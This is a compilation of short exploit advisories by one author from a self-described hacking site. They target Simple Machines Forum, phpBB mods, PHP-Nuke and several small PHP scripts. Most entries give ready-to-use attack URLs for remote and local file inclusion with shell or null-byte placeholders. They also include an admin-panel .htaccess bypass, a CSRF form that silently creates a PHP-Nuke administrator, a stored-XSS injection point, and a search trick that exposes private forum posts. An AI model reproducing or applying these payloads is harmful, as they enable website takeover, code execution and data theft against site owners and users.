Simple Machine Forum - Private section/posts/info disclosure
# Vulnerable: Simple Machine Forum [ALL Versions] # # Tested on SMF 1.1.4 # # Type: Private Section,Posts,Information disclosure. # # Risk: Low / Medium # # Discovered By Seph1roth # # Site: http://www.blackroots.it -> The Best Hacking site. (eng / ita) # # Explanation: # # If some section is rescricted only for staff,vips or private groups/members,this bug can be used for read entire section and message, without privileges. # # Example: # # In my forum i've a Staff area , and into that , there is a message that contain Bug,exploit or some others keywords...i'll put in the advanced search module # this keywords ,and i select "show results as messages"...and tadaaa...my priv8 zone can be read by everyone... # # Greetz to all BlackRoots users! # # Shoutz to all kiddies!
SMF .htaccess bypass
# ./start # # Discovered by Seph1roth on June 2007 (was priv8) # # Vulnerable: Simple Machine Forum [ALL Versions] # # Visit: http://www.blackroots.it - Best hacking site. # # Description: If smf has index.php?action=admin in .htaccess ,i can bypass that by typing in the url some variable of administration panel : example: index.php?action=admin (.htaccess,then access denied) index.php?action=membergroups (accessible) index.php?action=news (accessible) index.php?action=featuresettings (accessible) ...and others... i can bypass and enter the administration by typing the accessible variables in the url... # Greets to all BlackRoots Users # # Shoutz to all kiddies # # ./end
phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion
+++ + + phpBB Mod OpenID 0.2.0 BBStore.php RFI + Risk: High + Found by Seph1roth + Site: http://blackroots.it + +++ + Vulnerable Script Download: http://sourceforge.net/project/showfiles.php?group_id=178846 + Exploit: http://www.victim.it/path/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=[Shell]
sk.log v0.5.3 Remote File Inclusion
++ + sk.log v0.5.3 Remote File Inclusion + High Risk + Found by Seph1roth + http://blackroots.it ++ + Vulnerable Code + log.inc.php + include_once( "$SKIN_URL/php/logdisplay.inc.php" ); + Exploit /php-inc/log.inc.php?SKIN_URL=[Shell] + Script Download http://surfnet.dl.sourceforge.net/sourceforge/sklog/sk.log_v0.5.3.zip
Nuke Mobile Entartainment Local File Inclusion
--- # Found by Seph1roth # http://blackroots.it --- # Vulnerable script download http://www.suonerie-polifoniche-gratis.net/mobilentertainment.zip # Bug : http://VICTIM/[path]/data/compatible.php?module_name=[Local File]%00 # This is the vulnerable code : # include 'modules/'.$module_name.'compatibility/data/marque.data.php';
Re: Re: PHP-Nuke add admin ALL Versions
Yeah all versions of phpnuke is vulnerable ... Regards. Seph1roth
Neuron News 1.0 Local file inclusion (index.php)
+++ Neuron News 1.0 Local File inclusion +++ # Founded By Seph1roth # http://blackroots.it #Vulnerable Script Download: http://downloads.localhost.be/scripts/neuronnews.zip # Bug : http://[TARGET]/[PATH]/index.php?q=[Local File]%00 #Risk: The attacker can include sensible local file.
PHP-Nuke add admin ALL Versions
Paste this code into an HTML page then link it to victim (victim must be admin) http://VICTIMURL/nuke/admin.php"; target="aiuto" METHOD=POST> document.Faiuto.submit() You are admin now ;) Then you can log in into phpnuke with user HACKER and pass YOURPASSWORD...
WebED-0.8999 Multiple Remote File Inclusion Vulnerability
--- Multiple Remote File Inclusion Vulnerability --- # Founded by : Seph1roth # Download Script: http://sourceforge.net/projects/ed-engine/ WebED-0.8999.tar.gz # Exploit: # http://[target]/[path]/source/mod/rss/channeledit.php?Codebase=[Shell] # http://[target]/[path]/source/mod/rss/post.php?Codebase=[Shell] # http://[target]/[path]/source/mod/rss/view.php?Codebase=[Shell] # http://[target]/[path]/source/mod/rss/viewitem.php?Codebase=[Shell] ---
PhpBB Xs 2 profile.php Permanent Xss Vulnerability
+++ PhpBB Xs 2 profile.php Permanent Xss Vulnerability +++ #Found By Seph1roth +++ [POST METHOD] Corrupted page: profile.php?mode=editprofile&cpl_mode=profile_info Bugged Variable: "selfdes" (Campo "Altre informazioni") Xss: [XSS STRING]
